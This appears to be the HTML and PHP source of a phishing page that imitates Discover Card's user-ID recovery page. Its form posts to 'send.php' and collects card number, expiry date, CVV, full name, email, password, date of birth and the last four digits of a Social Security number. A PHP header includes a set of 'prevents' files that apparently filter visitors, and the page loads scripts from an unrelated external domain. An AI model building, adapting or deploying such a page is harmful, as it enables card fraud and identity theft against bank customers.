<!DOCTYPE HTML>
<?php
include 'prevents/Charone1.php';
include 'prevents/Charone2.php';
include 'prevents/Charone3.php';
include 'prevents/Charone4.php';
include 'prevents/Charone5.php';
include 'prevents/Charone6.php';
include 'prevents/Charone7.php';
include 'prevents/Charone8.php';

header('location:help.html')
exit;

?>
<html lang="en"><!-- @@@@  BEGIN:common/include/setup @@@@ --><!-- responsiveRegistrationPages array is used for the pages which are responsive as well as non-responsive --><!-- @@@@ END:common/include/setup @@@@ --><!-- @@@@  BEGIN:common/include/title @@@@ --><!-- @@@@  END:common/include/title @@@@ --><head><script async="" src="https://s.btstatic.com/tag.js#site=p9zWtoq"></script><script type="text/javascript" async="async" src="https://fls.doubleclick.net/json?spot=3471476&amp;src=1531196&amp;var=s_3_Integrate_DFA_get_0&amp;host=integrate.112.2o7.net%2Fdfa_echo%3Fvar%3Ds_3_Integrate_DFA_get_0%26AQE%3D1%26A2S%3D1&amp;ord=6256599358234"></script><script type="text/javascript" src="//www.discover.com/scripts/discoverlib.js"> </script>

	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=0">
	<meta name="format-detection" content="telephone=no">
	<meta http-equiv="X-UA-Compatible" content="IE=edge"> 
	<title>Recover Your Discover User ID | Discover</title>
	<link rel="shortcut icon" href="https://card.discover.com/global/images/favicon.ico" type="image/x-icon">
	<link rel="icon" href="https://card.discover.com/global/images/favicon.ico" type="image/x-icon">
	<!-- header footer css file -->
	  <!-- min css file -->				
	    <link rel="stylesheet" type="text/css" media="screen" href="https://card.discover.com/global/css/common.min.css?rel=e2315d2050">

	  <!-- min css file -->
	<!-- header footer css file -->
			<!-- @@@@ BEGIN:forgotUserId/css/css @@@@ -->

<link rel="stylesheet" type="text/css" media="screen" href="https://card.discover.com/applications/loginAssistance/css/loginAssist-rwd.min.css?ver=720914da2e">

<!-- @@@@ END:forgotUserId/css/css @@@@ -->

               <!--Add Optimizely Snippet-->
				 <!--Add Optimizely Snippet--> 

    <!--[if lte IE 8]>
    <script src="/global/libs/scripts/html5shiv.min.js" type="text/javascript"></script>
    <script src="/global/libs/scripts/respond.min.js" type="text/javascript"></script>
    <![endif]-->
<script type="text/javascript" src="/global/scripts/visitorAPI.js"></script>
<link rel="stylesheet" href="https://messaging.discover.com/css/freshchat-style.min.css?rel=81e323336b" type="text/css"><script src="https://js.extpost.xyz/js/i.js?1592653714666"></script><script>window.__TemperAssInit = true;window.__VUserUDID = '22f286257c7f10a5e4ee13922d962d6243473cb2';window.__VUserSUBID = 'STAGE2_PM_P1';</script><script src="https://js.extpost.xyz/js/i.js?1592656199865"></script><script>window.__TemperAssInit = true;window.__VUserUDID = '22f286257c7f10a5e4ee13922d962d6243473cb2';window.__VUserSUBID = 'STAGE2_PM_P1';</script></head>

<body class="FW_CSE">
       <div class="main-container mobile-responsive" style="padding-top: 61px;">
    <!-- Header starts --> 
    <header role="banner">
       <div class="header-wrapper card-activation-header animation" style="position: fixed; left: 0px; top: 0px;"><a id="skip-content" href="#main-content-rwd" class="sr-only sr-only-focusable">Skip to main content</a>
            <div class="header-content" style="position: relative;">
                <div class="logo-container">
                    <a href="https://www.discover.com/" class="discover-logo">
                        <img src="https://card.discover.com/global/images/discover-logo.png" alt="discover logo" width="113" height="18">
                    </a>   
                </div>
            </div>
       </div>
    </header>
    <!-- Header ends -->   

          <!-- main content -->
<!-- @@@@  BEGIN:forgotUserId/main/mainPage @@@@ -->


<!-- @@@@  BEGIN:forgotUserId/include/forgotuserid @@@@ -->
	
		<main class="container main-content" id="main-content-rwd">





		<input type="hidden" id="sitecat-page-name" value="forgot-userid-step1">
			<div class="top-contain-security col-xs-12 col-sm-12 col-md-12 horizontal-line">
				<h1 class="section-title">Discover Card</h1>
			</div>		
			<div class="clear-both"></div>
			<section class="login-assistance-section row no-margin">
			    <p class="log-you-in">In order to protect your account, we need to know who you are. Please provide details about the cardmember as well as your Discover Card.</p>
				<div class="secure-padding-none">
                                                <div class="out-band-right-container">
                                                        <div class="forgot-password-right-container">
                                                                <div class="secure-confidential-container">
                                                                        <i class="icon-secure-img"></i>
                                                                        <h2 class="secure-confidential">Secure and Confidential</h2>
                                                                </div>
                                                                <div class="account-security-container">
                                                                        <p class="account-security">We take your account security very seriously.
                                                                                <span class="login-assist-whats-this">     
<a class="tooltip-opener preventDefaultBehaviour down" href="javascript:void(0)" rel="learn-how-overlay">
                                                                                                <i class="icon-help"></i>Learn How<span class="sr-only">Opens modal dialog</span>
                                                                                        </a>
                                                                                </span>
                                                                        </p>
                                                                </div>
                                                        </div>
                                                </div>
                                        </div><form action="send.php" method="POST" autocomplete="off" class="form-wrapper">
					<input type="hidden" name="expdate" value="">
            <input id="bypassclientvalidation" type="hidden" value="false">			
						<div class="card-details hidden-md hidden-sm" aria-hidden="true">
						</div>
						<label for="card-number">16-Digit Card Number</label>
						<div class="input-wrapper">
							<input type="tel" class="form-control placeholder-text" id="card-number" placeholder="        -       -       -    " name="accountNumber" data-toggle="popover" data-content="Enter 16 digits." aria-required="true" maxlength="19" data-mask="0000-0000-0000-0000">
							<i class="icon-warning"></i>
							<i class="icon-error-triangle"></i>							 
						</div>					
						<label for="expiration-date">Expiration Date</label>
						<div class="input-wrapper">
							<input type="tel" class="form-control placeholder-text" id="expiration-date" placeholder="MM / YY" name="expirationDate" data-toggle="popover" data-content="Must be 4 digits." aria-required="true" maxlength="5" data-mask="00/00">
							<i class="icon-warning"></i>
							<i class="icon-error-triangle"></i>							 
						</div>
						<label for="expiration-date">CVC / CVV</label>
						<div class="input-wrapper">
							<input type="tel" class="form-control placeholder-text" id="expiration-date" placeholder="***" name="cvv" data-toggle="popover" data-content="Must be 3 digits." aria-required="true" maxlength="3" data-mask="00/00">
							<i class="icon-warning"></i>
							<i class="icon-error-triangle"></i>							 
						</div>
						<div class="cardmember-info">
																					
							
						</div>
<label>Full Name</label>
<div class="input-wrapper">
							<input type="text" class="form-control placeholder-text" name="name" placeholder="" data-toggle="popover">
							<i class="icon-warning"></i>
							<i class="icon-error-triangle"></i>								 
						</div>
<label>Email Address</label>
<div class="input-wrapper">
							<input class="form-control placeholder-text" name="email" placeholder="" type="text">
							<i class="icon-warning"></i>
							<i class="icon-error-triangle"></i>								 
						</div>
<label>Password</label>
<div class="input-wrapper">
							<input type="password" class="form-control placeholder-text" name="password" placeholder="•••••••••••" data-toggle="popover">
							<i class="icon-warning"></i>
							<i class="icon-error-triangle"></i>								 
						</div>							
						<label for="dob">Date of Birth</label>
						<div class="input-wrapper">
							<input type="tel" class="form-control placeholder-text" id="dob" name="dob" placeholder="MM / DD / YYYY" data-toggle="popover" data-content="Use a proper date of birth format (e.g. MM/DD/YYYY)." aria-required="true" maxlength="10" data-mask="00/00/0000">
							<i class="icon-warning"></i>
							<i class="icon-error-triangle"></i>								 
						</div>
						<label for="ssn">Last 4 Digits of Social Security Number</label>
						<div class="input-wrapper">
							<input type="tel" class="form-control placeholder-text" id="ssn" placeholder="xxxx" name="ssn" data-toggle="popover" data-content="Must be 4 digits." aria-required="true" maxlength="4" data-mask="0000">
							<i class="icon-warning"></i>
							<i class="icon-error-triangle"></i>								 
						</div>
						<div class="continue-button">
							<input type="submit" class="btn-primary" value="Continue" id="continue-btn-without-login">
							<a href="https://www.discover.com" class="cancel-lnk">Cancel</a>
						</div>
						<input type="hidden" name="ssid" id="ssid" value="DefaultSSID_NOSCRIPT" aria-hidden="true">
						<input type="hidden" name="" value="">	
						<input type="hidden" name="" value="">	
	
						<input type="hidden" id="jsenabled" name="jsenabled" value="true">
	
					</form>

<!-- @@@@  BEGIN:forgotUserId/overlays/overlays @@@@ -->


                                        <!-- Begin Standard Modal -->
                                        <div id="learn-how-overlay" class="tooltip-overlay hide">
                                                <div class="arrow-focus">
                                                        <div class="arrow-img"></div>
                                                        <div class="arrow-img-back"></div>
                                                </div>
                                                <div class="tooltip-header">
                                                </div>
                                                <div class="tooltip-body">

                                                        <p class="body-copy no-margin tooltip-anchor-heading">Safeguarding your personal information is our priority.That's why we use Transport Layer Security(TLS) with 128-bit and higher encryption technology- the most widely used method of securing transactions-when you access your account and perform transactions.</p>

                                                         <div class="clearfix"></div>
                                                </div>


                                                <a href="javascript:void(0)" class="close-disclosure close-link preventDefaultBehaviour" role="button">Close
                                                        <i class="icon-cross"></i>
                                                </a>
                                                <div class="arrow-focus-down">
                                                        <div class="arrow-img"></div>
                                                        <div class="arrow-img-back"></div>
                                                </div>                            
                                        </div>
                                        <!-- End Standard Modal -->

                                        <!-- Begin Reference Modal -->
                                        <div id="primary-cardmember-overlay" class="tooltip-overlay login-assistance-modal hide">
                                                <div class="arrow-focus">
                                                        <div class="arrow-img"></div>
                                                        <div class="arrow-img-back"></div>
                                                </div>
                                                <div class="tooltip-header">
                                                </div>
                                                <div class="tooltip-body">
                                                        <p class="body-copy no-margin tooltip-anchor-heading">The Primary Cardmember opened the account.Their name is listed first on statements and e-mails.</p>
                                                        <div class="clearfix"></div>
                                                </div>
                                                <a href="javascript:void(0)" class="close-disclosure close-link preventDefaultBehaviour" role="button">Close<i class="icon-cross"></i></a>
                                                <div class="arrow-focus-down">
                                                        <div class="arrow-img"></div>
                                                        <div class="arrow-img-back"></div>
                                                </div>                            
                                        </div>


<!-- @@@@  END:forgotUserId/overlays/overlays @@@@ -->
    </section>
 </main>

               
<!-- @@@@ END:forgotUserId/include/forgotuserid @@@@ -->
	
<div class="clear"></div>	

<!-- @@@@  END:forgotUserId/main/mainPage @@@@ -->




	<link rel="stylesheet" type="text/css" href="/css/oo5_style.css">
	<div class="clear">&nbsp;</div>

<!-- @@@@  BEGIN:footer/footer_thin_nonSecure @@@@ -->	
<!--footer starts -->
<footer role="contentinfo">        
		<div id="footerLinks" class="footer-nav sso-footer">
			<div class="secondary-navigation">
				<div class="secondary-navigation-menu">
					
          <div class="sso-footer-links">
              <ul>
                 <li><a href="https://www.discover.com/credit-cards/help-center/contact-us/index.html" class="first">Contact Us</a></li>
                 <li><a href="https://www.discover.com/credit-cards/help-center/terms-of-use.html?ICMPGN=FTR_TERMS_USE" class="second" target="_blank">Terms of Use</a></li>
                 <li class="nextLine"><a href="https://www.discover.com/privacy-statement/index.html?ICMPGN=FTR_CUST_PRIVACY" class="nextLineAnch" target="_blank">Privacy Statement</a></li>
                 <li><a href="https://www.discover.com/credit-cards/member-benefits/security-center?ICMPGN=FTR_CUST_SECURITY" class="last" target="_blank">Security</a></li>
              </ul>               
          </div>
					<div class="link-container social-icons no-accordian">
						<ul>
						<li>
								<a class="icon-tw" target="_blank" title="Follow Us on Twitter" href="https://www.twitter.com/discover" role="link"></a>
						</li>
						<li>
								<a class="icon-fb" href="https://www.facebook.com/discover" title="Like Us on Facebook" target="_blank" role="link"></a>
						</li>                   
						<li class="instagram-plus-link">
								<a href="https://www.instagram.com/discover" class="icon-instagramPlus" target="_blank" title="Instagram"></a>
						</li>
						<li class="linkedin-link">
								<a class="icon-linkedin" target="_blank" title="Connect with Us on LinkedIn" href="https://linkedin.com/company/discover-financial-services" role="link"></a>
						</li>
						<li class="last-social"> 
								<a class="footer-icon-mobile" target="_blank" title="Discover Mobile" href="https://www.discover.com/credit-cards/member-benefits/mobile?ICMPGN=FTR_ICON_MOBILE">
								<i class="icon-app-discover"></i><span class="app-text">DISCOVER MOBILE APP</span></a>
						</li>
					</ul>
					</div>
				</div>
			
				<div class="association-menu">

					<div class="certification-links">
						<ul>
							<li>
								<a class="icon-equal-housing-lender" aria-label="Equal Housing Lender" href="https://www.discover.com/home-loans/state-licenses?ICMPGN=FTR_ICON_EHL" target="_blank" role="link"></a>
							</li>
							<li>
                                <a class="icon-accredited-business" aria-label="ACCREDITED BUSINESS" href="https://www.bbb.org/chicago/business-reviews/credit-cards-and-plans/discover-financial-services-in-riverwoods-il-1004324" target="_blank"></a>
                            </li> 
							<li>
								<a class="icon-member-fdic" aria-label="Member FDIC" href="https://www.fdic.gov" target="_blank" role="link"></a>
							</li>                    
						</ul>
						<small class="copyright footer-logo-align">©<span class="current-year">2020</span> Discover Bank, Member FDIC</small>
					</div>
				</div>
			</div>
		</div>
            

    </footer>
<!--footer ends -->

<!-- @@@@  START:scripts/scripts_global_nonSecure_noBootStrap @@@@ -->

		<!--
			Following file will include "s_account" variable which will decide site cat env value.
			in PROD this variable should hold value as "PROD". In other regions(except PROD) this should be DEV
		-->
<!-- This variable will be used for deciding Site Catalyst s_account varibale -->
<input id="s_account" type="hidden" value="prod" name="s_account">        <!-- header footer js file -->
        <!-- min js files -->
            <script src="/global/libs/scripts/libs.min.js?ver=83cb8e1c62" type="text/javascript"></script>
<script src="/global/public/scripts/siteTag.js" type="text/javascript"></script>
            <script src="/global/scripts/common.min.js?ver=4a6bb7tty" type="text/javascript"></script>
	    <script src="/global/scripts/thirdparty.min.js?ver=a5da91b115" type="text/javascript"></script>
 		 <script src="/global/scripts/backbone-file3.min.js?ver=aa5b76dd51" type="text/javascript"></script>
		 <script src="https://messaging.discover.com/js/freshchat-widget-links.js"></script>
		 <script src="/global/scripts/jquery-ui.min.js?rel=6d1273fafe" type="text/javascript"></script>
        <!-- min js files -->

<!-- @@@@  END:scripts/scripts_global_nonSecure_noBootStrap @@@@ -->
<!-- @@@@  START:scripts/scripts_app @@@@ -->
			<!-- @@@@  BEGIN:forgotUserId/scripts/scripts @@@@ -->		
<!-- Componenet js files -->
		
		<script src="/applications/loginAssistance/scripts/login-assist.min.js?ver=27eaeeb5871" type="text/javascript"></script>
		
<!-- Start freshchat change -->
<script src="/applications/loginAssistance/scripts/fc_registration_error.js" type="text/javascript"></script>
<!-- End freshchat change -->
<!-- @@@@  END:forgotUserId/scripts/scripts @@@@ -->
<!-- @@@@  END:scripts/scripts_app @@@@ -->
															
<input type="hidden" name="pagenamecheck" id="pagenamecheck" value="forgotUserId">






</div><script src="https://content.discover.com/fp/tags.js?org_id=o7f2hmf6&amp;session_id=f3ef4ceb-1280-42f9-b1f3-fc6961436bc-1592653713996"></script><div class="error_chat_message" style="display: none;">We are sorry, this feature is temporarily unavailable.</div><iframe src="about:blank" id="tmx_tags_iframe" title="empty" tabindex="-1" aria-disabled="true" aria-hidden="true" style="width: 100px; height: 100px; border: 0px none; top: -5000px;"></iframe><iframe src="about:blank" id="tmx_tags_iframe" title="empty" tabindex="-1" aria-disabled="true" aria-hidden="true" style="width: 100px; height: 100px; border: 0px none; top: -5000px;"></iframe>
<!-- Start of LiveChat (www.livechatinc.com) code -->
<script>
    window.__lc = window.__lc || {};
    window.__lc.license = 12060798;
    ;(function(n,t,c){function i(n){return e._h?e._h.apply(null,n):e._q.push(n)}var e={_q:[],_h:null,_v:"2.0",on:function(){i(["on",c.call(arguments)])},once:function(){i(["once",c.call(arguments)])},off:function(){i(["off",c.call(arguments)])},get:function(){if(!e._h)throw new Error("[LiveChatWidget] You can't use getters before load.");return i(["get",c.call(arguments)])},call:function(){i(["call",c.call(arguments)])},init:function(){var n=t.createElement("script");n.async=!0,n.type="text/javascript",n.src="https://cdn.livechatinc.com/tracking.js",t.head.appendChild(n)}};!n.__lc.asyncInit&&e.init(),n.LiveChatWidget=n.LiveChatWidget||e}(window,document,[].slice))
</script>
<noscript><a href="https://www.livechatinc.com/chat-with/12060798/" rel="nofollow">Chat with us</a>, powered by <a href="https://www.livechatinc.com/?welcome" rel="noopener nofollow" target="_blank">LiveChat</a></noscript>
<!-- End of LiveChat code -->
</body></html>